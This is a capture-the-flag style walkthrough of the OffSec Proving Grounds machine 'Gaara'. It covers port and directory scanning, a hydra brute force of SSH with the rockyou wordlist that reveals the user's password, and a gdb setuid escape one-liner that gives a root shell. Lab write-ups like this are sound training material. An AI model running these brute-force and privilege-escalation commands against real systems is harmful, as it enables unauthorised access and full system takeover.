OffSec PG - Gaara


Machine IP →

Network Scan

Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 ((Debian))

Web Scan

GoBuster scan → gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php

This did not reveal any useful information.


Using the image on the webpage as a reference, the username could be gaara. Therefore, used hydra to brute force the ssh server against the rockyou password list.

hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://

This gives the password as iloveyou2 and subsequently gets the user flag.

Privilege Escalation

Checking for setuid binaries reveals the presence of gdb as a setuid to root executable. The user is not present in the sudoers file. Therefore, it is essential to escalate using the gdb binary.

This is done as follows → gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit.

This grants the root shell and subsequently the root flag.

This post is licensed under CC BY 4.0 by the author.